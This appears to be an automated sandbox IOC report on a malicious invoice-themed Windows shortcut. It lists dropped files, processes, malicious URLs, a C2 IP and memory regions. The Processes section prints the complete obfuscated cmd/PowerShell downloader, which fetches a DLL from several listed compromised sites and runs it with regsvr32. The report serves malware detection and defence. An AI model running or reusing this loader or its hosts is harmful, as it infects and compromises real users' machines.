IOC Report
RechnungsDetails 2022.20.05_1044.lnk

loading gif

Files

File Path
Type
Category
Malicious
RechnungsDetails 2022.20.05_1044.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=134, Archive, ctime=Fri Feb 4 06:07:07 2022, mtime=Thu May 19 18:45:55 2022, atime=Fri Feb 4 06:07:07 2022, length=289792, window=hidenormalshowminimized
initial sample
malicious
C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xcd192033, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtms2noi.pps.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvcdsjdc.j3a.ps1
very short file (no magic)
dropped
C:\Users\user\Documents\20220523\PowerShell_transcript.580913.ffZmUZc7.20220523085407.txt
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
ASCII text, with no line terminators
dropped
C:\Windows\System32\ZrCipB\RLcE.dll (copy)
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe" /v:on /c zlkGA07kqp/HVSJK6L7RjY+ay04qYhLTdlRQkqIXeTfVVJIU9NeSf/9YcHLfxyd+ETRqdB8X||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
malicious
C:\Windows\System32\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
malicious
C:\Windows\System32\regsvr32.exe
C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZrCipB\RLcE.dll"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://www.jsonsintl.com/
unknown
malicious
http://digitalkitchen.jp/images/PVn/
unknown
malicious
https://173.82.82.196/hU
unknown
malicious
https://173.82.82.196/
unknown
malicious
http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/
unknown
malicious
https://173.82.82.196:8080/s64
unknown
malicious
http://piffl.com/piffl.com/a/ity.
unknown
malicious
http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/
98.142.105.106
malicious
http://jsonsintl.com
unknown
malicious
https://173.82.82.196:8080/
unknown
malicious
http://piffl.com/piffl.com/a/
unknown
malicious
https://173.82.82.196:8080/tem
unknown
malicious
https://nakharinitwebhosting.com/HSDYKN1X5GLF/
unknown
malicious
http://www.jsonsintl.com
unknown
malicious
http://www.jsonsintl.comx
unknown
malicious
https://www.disneyplus.com/legal/your-california-privacy-rights
unknown
http://nuget.org/NuGet.exe
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://crl.ver)
unknown
https://www.tiktok.com/legal/report/feedback
unknown
https://github.com/Pester/Pester
unknown
https://support.hotspotshield.com/
unknown
https://www.disneyplus.com/legal/privacy-policy
unknown
http://crl.microsof
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.hotspotshield.com/terms/
unknown
https://www.pango.co/privacy
unknown
https://disneyplus.com/legal.
unknown
https://www.tiktok.com/legal/report
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://cmentarz.5v.pl/themes/zalMkTb/
unknown
http://help.disneyplus.com.
unknown
There are 27 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
jsonsintl.com
98.142.105.106
malicious
www.jsonsintl.com
unknown
malicious

IPs

IP
Domain
Country
Malicious
173.82.82.196
unknown
United States
malicious
98.142.105.106
jsonsintl.com
United States
malicious
192.168.2.1
unknown
unknown
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
@%SystemRoot%\System32\ci.dll,-100
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
@%SystemRoot%\System32\ci.dll,-101
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
@%SystemRoot%\System32\fveui.dll,-843
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
@%SystemRoot%\System32\fveui.dll,-844
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
@%SystemRoot%\System32\wuaueng.dll,-400
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
@%SystemRoot%\system32\NgcRecovery.dll,-100
There are 13 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
180001000
direct allocation
page execute read
malicious
1E40000
direct allocation
page execute and read and write
malicious
180001000
direct allocation
page execute read
malicious
2220000
direct allocation
page execute and read and write
malicious
24DE000
stack
page read and write
2070000
remote allocation
page read and write
295583CF000
heap
page read and write
1F197D00000
trusted library allocation
page read and write
1F197E50000
trusted library allocation
page read and write
1AFF92A1000
trusted library allocation
page read and write
1AFF9120000
trusted library allocation
page read and write
1F192590000
trusted library allocation
page read and write
295583C6000
heap
page read and write
1F197EAB000
heap
page read and write
9E5000
heap
page read and write
1F193002000
heap
page read and write
1AFF9150000
trusted library allocation
page read and write
1A5B474B000
heap
page read and write
27EE419D000
heap
page read and write
140000
heap
page read and write
1AFF9160000
trusted library allocation
page read and write
1AFE1D23000
trusted library allocation
page read and write
7FF9F1D50000
trusted library allocation
page read and write
7DF4AEA20000
trusted library allocation
page execute and read and write
1AFF9180000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
5EF21FE000
stack
page read and write
27EE4603000
heap
page read and write
1AFF9160000
trusted library allocation
page read and write
7FF9F1CA0000
trusted library allocation
page read and write
1AFDEF99000
heap
page read and write
7FF9F1E00000
trusted library allocation
page read and write
25DE000
stack
page read and write
24E0D26C000
heap
page read and write
1AFE1DDC000
trusted library allocation
page read and write
1F19263D000
heap
page read and write
22C9BD00000
heap
page read and write
1AFF907D000
heap
page read and write
27EE419A000
heap
page read and write
29558387000
heap
page read and write
29559200000
trusted library allocation
page read and write
166DC47C000
heap
page read and write
1A5B48C5000
heap
page read and write
1AFDF013000
heap
page read and write
1AFF92A8000
trusted library allocation
page read and write
27EE417B000
heap
page read and write
1F193810000
trusted library section
page readonly
27EE418D000
heap
page read and write
24D1DC02000
heap
page read and write
AF15E7C000
stack
page read and write
7FF9F1A80000
trusted library allocation
page read and write
1AFF9150000
trusted library allocation
page read and write
27EE36EE000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
22C9BE74000
heap
page read and write
1A5B476E000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
1AFF8EE1000
heap
page read and write
166DC513000
heap
page read and write
2070000
remote allocation
page read and write
24D1DD08000
heap
page read and write
585000
heap
page read and write
1AFE1BC6000
trusted library allocation
page read and write
22C9BF02000
heap
page read and write
27EE4183000
heap
page read and write
1AFE0B90000
heap
page read and write
193DFDE000
stack
page read and write
1F193113000
heap
page read and write
27EE419C000
heap
page read and write
7FF9F1D40000
trusted library allocation
page read and write
1AFF92B0000
trusted library allocation
page read and write
1F197D30000
trusted library allocation
page read and write
166DC502000
heap
page read and write
5A0000
heap
page read and write
1F198060000
remote allocation
page read and write
27EE41B2000
heap
page read and write
27EE4189000
heap
page read and write
1AFF9130000
trusted library allocation
page read and write
166DC44D000
heap
page read and write
295582B0000
heap
page read and write
1AFF94E0000
trusted library allocation
page read and write
7FF9F1D10000
trusted library allocation
page read and write
1AFF9150000
trusted library allocation
page read and write
27EE4174000
heap
page read and write
166DC1B0000
heap
page read and write
1F00000
trusted library allocation
page read and write
1F193118000
heap
page read and write
1AFE1D2C000
trusted library allocation
page read and write
1F19266E000
heap
page read and write
27EE4183000
heap
page read and write
F9FDEFE000
stack
page read and write
1AFF92A0000
trusted library allocation
page read and write
1F197D24000
trusted library allocation
page read and write
7FFA52460000
unkown
page readonly
1AFF92A0000
trusted library allocation
page read and write
1AFF9520000
trusted library allocation
page read and write
F9FDCF7000
stack
page read and write
27EE36A4000
heap
page read and write
D1D2DFB000
stack
page read and write
9DD3AFF000
stack
page read and write
1F197E63000
heap
page read and write
590000
heap
page readonly
166DC402000
heap
page read and write
7FF9F1B20000
trusted library allocation
page read and write
24E0D308000
heap
page read and write
F9FD8FD000
stack
page read and write
2380000
heap
page read and write
193F38F000
stack
page read and write
1F1937C0000
trusted library section
page readonly
960000
heap
page readonly
1AFF90A8000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
166DC1C0000
heap
page read and write
1F193015000
heap
page read and write
7FFA5248F000
unkown
page readonly
1AFE0EE1000
trusted library allocation
page read and write
7FFA5248F000
unkown
page readonly
1F197E85000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
27EE4174000
heap
page read and write
24D1E602000
trusted library allocation
page read and write
1AFF9140000
trusted library allocation
page read and write
1AFF9170000
trusted library allocation
page read and write
1AFF9170000
trusted library allocation
page read and write
1AFF92A0000
trusted library allocation
page read and write
5C6000
stack
page read and write
1F197E4C000
heap
page read and write
1F193800000
trusted library section
page readonly
1AFE1B7B000
trusted library allocation
page read and write
1AFF92C0000
trusted library allocation
page read and write
166DC44A000
heap
page read and write
1AFE1DD4000
trusted library allocation
page read and write
27EE4602000
heap
page read and write
22C9BD70000
heap
page read and write
27EE419C000
heap
page read and write
245C000
stack
page read and write
295582F5000
heap
page read and write
22C9BF00000
heap
page read and write
556397E000
stack
page read and write
1AFE1BAD000
trusted library allocation
page read and write
1000FE000
stack
page read and write
24D1DC3C000
heap
page read and write
60D000
heap
page read and write
18002D000
direct allocation
page read and write
1A5B476E000
heap
page read and write
AF1607D000
stack
page read and write
A1B000
heap
page read and write
7FFA5248B000
unkown
page read and write
5E2000
heap
page read and write
1AFF9171000
trusted library allocation
page read and write
1F197EFC000
heap
page read and write
1AFE206E000
trusted library allocation
page read and write
27EE4602000
heap
page read and write
1AFDF160000
heap
page read and write
27EE3678000
heap
page read and write
1AFF92D0000
trusted library allocation
page read and write
9DD31FE000
stack
page read and write
60D000
heap
page read and write
27EE34D0000
heap
page read and write
193F2CE000
stack
page read and write
166DC413000
heap
page read and write
D1D28BC000
stack
page read and write
1AFF9140000
trusted library allocation
page read and write
1AFE1B84000
trusted library allocation
page read and write
27EE417A000
heap
page read and write
1A5B476E000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
A1C000
heap
page read and write
166DC454000
heap
page read and write
27EE41AD000
heap
page read and write
1F197E2D000
heap
page read and write
24D1DC81000
heap
page read and write
1AFE1AF8000
trusted library allocation
page read and write
27EE3E90000
remote allocation
page read and write
9DD367E000
stack
page read and write
1F197D20000
trusted library allocation
page read and write
1F1937E0000
trusted library section
page readonly
1AFF9150000
trusted library allocation
page read and write
7FF9F1D30000
trusted library allocation
page read and write
24E0D1D0000
trusted library allocation
page read and write
180000000
direct allocation
page read and write
27EE417D000
heap
page read and write
1AFE0A60000
trusted library allocation
page read and write
1AFF92A0000
trusted library allocation
page read and write
24D1DC8C000
heap
page read and write
18002E000
direct allocation
page readonly
1F197DD0000
trusted library allocation
page read and write
27EE41DB000
heap
page read and write
1F193159000
heap
page read and write
22C9BE6F000
heap
page read and write
24D1DAE0000
heap
page read and write
27EE36B5000
heap
page read and write
22C9BE3C000
heap
page read and write
27EE4189000
heap
page read and write
1AFF9140000
trusted library allocation
page read and write
1F197D30000
trusted library allocation
page read and write
27EE41B2000
heap
page read and write
1AFF9170000
trusted library allocation
page read and write
F9FDDFE000
stack
page read and write
27EE4174000
heap
page read and write
5EF20FB000
stack
page read and write
1AFF9140000
trusted library allocation
page read and write
27EE36AC000
heap
page read and write
1F193000000
heap
page read and write
27EE4186000
heap
page read and write
29559260000
trusted library allocation
page read and write
1A5B4786000
heap
page read and write
667000
heap
page read and write
1AFF92B0000
trusted library allocation
page read and write
27EE419E000
heap
page read and write
1F19268E000
heap
page read and write
1AFE10F0000
trusted library allocation
page read and write
27EE418D000
heap
page read and write
1AFF92B0000
trusted library allocation
page read and write
F9FD97E000
stack
page read and write
9E0000
heap
page read and write
29559210000
trusted library allocation
page read and write
193E6FE000
stack
page read and write
1AFF92A0000
trusted library allocation
page read and write
24D1DB50000
heap
page read and write
27EE4189000
heap
page read and write
18002C000
direct allocation
page readonly
667000
heap
page read and write
9DD36FE000
stack
page read and write
166DC451000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
28DE000
stack
page read and write
1F192560000
heap
page read and write
27EE3613000
heap
page read and write
1F192693000
heap
page read and write
22C9BE13000
heap
page read and write
27EE415C000
heap
page read and write
5F0000
remote allocation
page read and write
980000
heap
page read and write
1AFF92B0000
trusted library allocation
page read and write
681000
heap
page read and write
27EE4002000
heap
page read and write
1AFF9170000
trusted library allocation
page read and write
A1C777F000
stack
page read and write
1F00000
trusted library allocation
page read and write
27EE362C000
heap
page read and write
1AFDF07E000
heap
page read and write
A1F000
heap
page read and write
5A8000
heap
page read and write
27EE41CF000
heap
page read and write
295582F0000
heap
page read and write
1AFF95B0000
trusted library allocation
page read and write
248C000
stack
page read and write
1008FC000
stack
page read and write
27EE417C000
heap
page read and write
7FF9F1CB0000
trusted library allocation
page read and write
24D1DC5C000
heap
page read and write
AF161F8000
stack
page read and write
24E0D255000
heap
page read and write
7FF9F1D70000
trusted library allocation
page read and write
5EF23FD000
stack
page read and write
1AFE2077000
trusted library allocation
page read and write
295583C6000
heap
page read and write
193E87B000
stack
page read and write
1AFF9170000
trusted library allocation
page read and write
988000
heap
page read and write
7FF9F1C2C000
trusted library allocation
page read and write
24E0D200000
heap
page read and write
7FFA52461000
unkown
page execute read
7FF9F1C52000
trusted library allocation
page read and write
27EE3658000
heap
page read and write
F9FDB7B000
stack
page read and write
1F1926FC000
heap
page read and write
193E7FC000
stack
page read and write
1AFE0A30000
trusted library allocation
page read and write
1AFF8FF0000
heap
page read and write
24D1DC00000
heap
page read and write
27EE34C0000
heap
page read and write
7FF9F1C90000
trusted library allocation
page read and write
1AFF92A0000
trusted library allocation
page read and write
7FF9F1DA0000
trusted library allocation
page read and write
8D0000
heap
page read and write
27EE36EA000
heap
page read and write
193F34D000
stack
page read and write
27EE4602000
heap
page read and write
1F192500000
heap
page read and write
7FF9F1A70000
trusted library allocation
page read and write
1AFF92A0000
trusted library allocation
page read and write
7FF9F1D07000
trusted library allocation
page read and write
55638F8000
stack
page read and write
29558150000
heap
page read and write
24E0D313000
heap
page read and write
29558FC0000
trusted library allocation
page read and write
295B000
stack
page read and write
1AFF92A0000
trusted library allocation
page read and write
27EE418B000
heap
page read and write
AF15F7D000
stack
page read and write
1AFF95C0000
trusted library allocation
page read and write
1F197E3F000
heap
page read and write
1F198040000
trusted library allocation
page read and write
1F30000
heap
page read and write
5EF1BFB000
stack
page read and write
27EE418B000
heap
page read and write
27EE419C000
heap
page read and write
1AFF92D0000
trusted library allocation
page read and write
1F198010000
trusted library allocation
page read and write
1A5B4710000
heap
page read and write
1001FE000
stack
page read and write
27EE36FD000
heap
page read and write
166DC43C000
heap
page read and write
7FF9F1A83000
trusted library allocation
page read and write
1AFDF190000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
420000
remote allocation
page read and write
F9FDBFE000
stack
page read and write
1AFF92A0000
trusted library allocation
page read and write
1AFF92B0000
trusted library allocation
page read and write
1AFF92A0000
trusted library allocation
page read and write
27EE3E90000
remote allocation
page read and write
1F1937D0000
trusted library section
page readonly
193E678000
stack
page read and write
925000
heap
page read and write
1AFE1D4E000
trusted library allocation
page read and write
27EE417D000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
1AFF9141000
trusted library allocation
page read and write
1A5B475F000
heap
page read and write
166DC45F000
heap
page read and write
1F198020000
trusted library allocation
page read and write
1AFF934C000
heap
page read and write
193E37D000
stack
page read and write
920000
heap
page read and write
9DD2FFA000
stack
page read and write
1AFF9075000
heap
page read and write
166DC493000
heap
page read and write
24E0D27E000
heap
page read and write
1F197E12000
heap
page read and write
1F197EF5000
heap
page read and write
9DD30FB000
stack
page read and write
1AFF9140000
trusted library allocation
page read and write
193E77E000
stack
page read and write
62F000
heap
page read and write
166DC44E000
heap
page read and write
1AFF92B0000
trusted library allocation
page read and write
1AFDF04E000
heap
page read and write
1AFF92F2000
heap
page read and write
18002C000
direct allocation
page readonly
1AFF9140000
trusted library allocation
page read and write
27EE4196000
heap
page read and write
1AFF0F43000
trusted library allocation
page read and write
1AFE1BA1000
trusted library allocation
page read and write
24E0D264000
heap
page read and write
166DC457000
heap
page read and write
7FF9F1C60000
trusted library allocation
page execute and read and write
1AFF92B0000
trusted library allocation
page read and write
1F197F02000
heap
page read and write
1F192658000
heap
page read and write
22C9BE28000
heap
page read and write
1AFDEF00000
heap
page read and write
1AFF92B0000
trusted library allocation
page read and write
9DD32F9000
stack
page read and write
24D1DC73000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
29558330000
trusted library allocation
page read and write
1AFF9540000
trusted library allocation
page read and write
27EE411C000
heap
page read and write
1F197D08000
trusted library allocation
page read and write
24D1DC63000
heap
page read and write
27EE36C0000
heap
page read and write
193E4FA000
stack
page read and write
1F1937F0000
trusted library section
page readonly
193DF9F000
stack
page read and write
166DC470000
heap
page read and write
27EE36D6000
heap
page read and write
24E0D24A000
heap
page read and write
27EE36AC000
heap
page read and write
24D1DD02000
heap
page read and write
22CF000
stack
page read and write
7FF9F1A73000
trusted library allocation
page execute and read and write
203F000
stack
page read and write
1F197BE0000
trusted library allocation
page read and write
1AFF9140000
trusted library allocation
page read and write
1AFF9314000
heap
page read and write
1AFE1BB2000
trusted library allocation
page read and write
63D000
heap
page read and write
1AFE1FE6000
trusted library allocation
page read and write
1F193118000
heap
page read and write
1AFF9510000
trusted library allocation
page read and write
10007C000
stack
page read and write
1AFF9150000
trusted library allocation
page read and write
1A5B4762000
heap
page read and write
24D1DC52000
heap
page read and write
27EE417D000
heap
page read and write
1AFDF280000
heap
page read and write
667000
heap
page read and write
1AFF9124000
trusted library allocation
page read and write
1AFF92A1000
trusted library allocation
page read and write
166DC481000
heap
page read and write
1AFDF210000
trusted library allocation
page read and write
1AFF92A0000
trusted library allocation
page read and write
27EE41AD000
heap
page read and write
1AFE0B60000
heap
page execute and read and write
1AFDF250000
heap
page read and write
1F197D40000
trusted library allocation
page read and write
7FF9F1CF0000
trusted library allocation
page read and write
18002D000
direct allocation
page read and write
1AFF92B0000
trusted library allocation
page read and write
AF15EFE000
stack
page read and write
166DC42A000
heap
page read and write
7FFA5248B000
unkown
page read and write
27EE4602000
heap
page read and write
1F193102000
heap
page read and write
7FF9F1CC0000
trusted library allocation
page read and write
27EE4619000
heap
page read and write
22C9BE52000
heap
page read and write
27EE417A000
heap
page read and write
1AFF92CC000
trusted library allocation
page read and write
2510000
heap
page read and write
1AFE1B2A000
trusted library allocation
page read and write
1AFF92E3000
heap
page read and write
1AFF9140000
trusted library allocation
page read and write
1F1926A0000
heap
page read and write
1F192FD1000
trusted library allocation
page read and write
7FF9F1DF0000
trusted library allocation
page read and write
1F197EE4000
heap
page read and write
1AFE0F49000
trusted library allocation
page read and write
1AFF92C0000
trusted library allocation
page read and write
166DC320000
trusted library allocation
page read and write
7FFA52461000
unkown
page execute read
5E2000
heap
page read and write
1F192673000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
193E3FE000
stack
page read and write
1AFF9170000
trusted library allocation
page read and write
7FF9F1B26000
trusted library allocation
page read and write
27EE4182000
heap
page read and write
1F192678000
heap
page read and write
9DD34FE000
stack
page read and write
1AFDF1F0000
trusted library allocation
page read and write
500000
heap
page read and write
1A5B4840000
heap
page read and write
1AFE0B95000
heap
page read and write
1AFF92B0000
trusted library allocation
page read and write
AF1657E000
unkown
page read and write
1F192FF0000
trusted library allocation
page read and write
1AFF94E0000
trusted library allocation
page read and write
27EE4620000
heap
page read and write
22C9BE02000
heap
page read and write
1AFF9140000
trusted library allocation
page read and write
7FF9F1C21000
trusted library allocation
page read and write
1AFDEF90000
heap
page read and write
22C9BE00000
heap
page read and write
1AFF9322000
heap
page read and write
1F193100000
heap
page read and write
1AFF92D0000
trusted library allocation
page read and write
1AFF92C0000
trusted library allocation
page read and write
1AFF92A0000
trusted library allocation
page read and write
1AFE1FDE000
trusted library allocation
page read and write
1AFF94F0000
trusted library allocation
page read and write
1F197D44000
trusted library allocation
page read and write
265F000
stack
page read and write
29558480000
trusted library allocation
page read and write
27EE418E000
heap
page read and write
27EE3702000
heap
page read and write
7FF9F1D60000
trusted library allocation
page read and write
1F19269E000
heap
page read and write
AF164FE000
stack
page read and write
1A5B4780000
heap
page read and write
1006F7000
stack
page read and write
24D1DC5E000
heap
page read and write
1F197BF0000
trusted library allocation
page read and write
420000
remote allocation
page read and write
27EE4602000
heap
page read and write
7FFA52482000
unkown
page readonly
1AFF92C0000
trusted library allocation
page read and write
1AFF9570000
trusted library allocation
page read and write
A1C715B000
stack
page read and write
27EE3E90000
remote allocation
page read and write
240E000
stack
page read and write
1AFF9580000
trusted library allocation
page read and write
27EE4187000
heap
page read and write
A3A000
heap
page read and write
7FF9F1D00000
trusted library allocation
page read and write
193E577000
stack
page read and write
5563879000
stack
page read and write
1AFF92D0000
trusted library allocation
page read and write
1A5B4784000
heap
page read and write
1AFF9170000
trusted library allocation
page read and write
5DA000
heap
page read and write
27EE41AD000
heap
page read and write
24D1DC61000
heap
page read and write
1AFF94E0000
trusted library allocation
page read and write
667000
heap
page read and write
1F197F06000
heap
page read and write
193E47F000
stack
page read and write
27EE3600000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
1AFF9170000
trusted library allocation
page read and write
1AFF92A0000
trusted library allocation
page read and write
1AFF92A0000
trusted library allocation
page read and write
1F192613000
heap
page read and write
1AFF0EF0000
trusted library allocation
page read and write
1AFF9517000
trusted library allocation
page read and write
1A5B4764000
heap
page read and write
22C9BE65000
heap
page read and write
7FF9F1A8C000
trusted library allocation
page read and write
556355E000
stack
page read and write
1F1924F0000
heap
page read and write
27EE36B0000
heap
page read and write
1AFF9170000
trusted library allocation
page read and write
7FF9F1C70000
trusted library allocation
page read and write
D1D2EF7000
stack
page read and write
55639FC000
stack
page read and write
7FF9F1DD0000
trusted library allocation
page read and write
D1D293F000
stack
page read and write
27EE4186000
heap
page read and write
27EE4171000
heap
page read and write
1AFE1D1A000
trusted library allocation
page read and write
27EE36E3000
heap
page read and write
166DC508000
heap
page read and write
1AFE1B3D000
trusted library allocation
page read and write
193F48D000
stack
page read and write
1F193159000
heap
page read and write
1AFF92A7000
trusted library allocation
page read and write
580000
heap
page read and write
27EE418D000
heap
page read and write
1AFF92D0000
trusted library allocation
page read and write
1F192629000
heap
page read and write
7FF9F1E10000
trusted library allocation
page read and write
7FF9F1C80000
trusted library allocation
page read and write
7FF9F1D90000
trusted library allocation
page read and write
24E0D264000
heap
page read and write
193E2FD000
stack
page read and write
63D000
heap
page read and write
1AFF94F0000
trusted library allocation
page read and write
24E0D202000
heap
page read and write
29558350000
trusted library allocation
page read and write
29558380000
heap
page read and write
27EE417A000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
950000
direct allocation
page execute and read and write
1AFF9141000
trusted library allocation
page read and write
24E0D23C000
heap
page read and write
7FF9F1C40000
trusted library allocation
page execute and read and write
295583CE000
heap
page read and write
27EE417D000
heap
page read and write
24E0D1A0000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
1AFF92C0000
trusted library allocation
